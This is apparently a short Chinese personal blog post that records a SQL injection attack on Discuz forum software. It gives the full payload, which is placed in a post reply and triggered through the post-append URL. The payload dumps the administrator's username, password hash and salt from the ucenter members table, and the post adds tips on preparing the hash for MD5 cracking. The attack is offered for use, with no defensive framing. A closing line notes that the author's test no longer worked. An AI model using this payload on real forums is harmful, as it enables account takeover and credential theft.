这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点!
1.注册个用户,登录
2.随便找个帖子回复!
回复内容 ↓
注入语句:
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='
然后到回复补充那里随便补充一下,注入语句就被执行。
补充的地址:
forum.php?mod=misc&tid=1396&action=postappend&pid=12026
爆出了管理和密码。格式是这样的: 管理|密码|XXXX
我们这时候要把 密码|XXXX 这里的 | 换成 : 就是这样 管理|密码:xxxx
因为dz的密码是加密的。所以后面还有一个加密。 所以去MD5解密的时候记得。MD5:XXX
测试无效了。。。。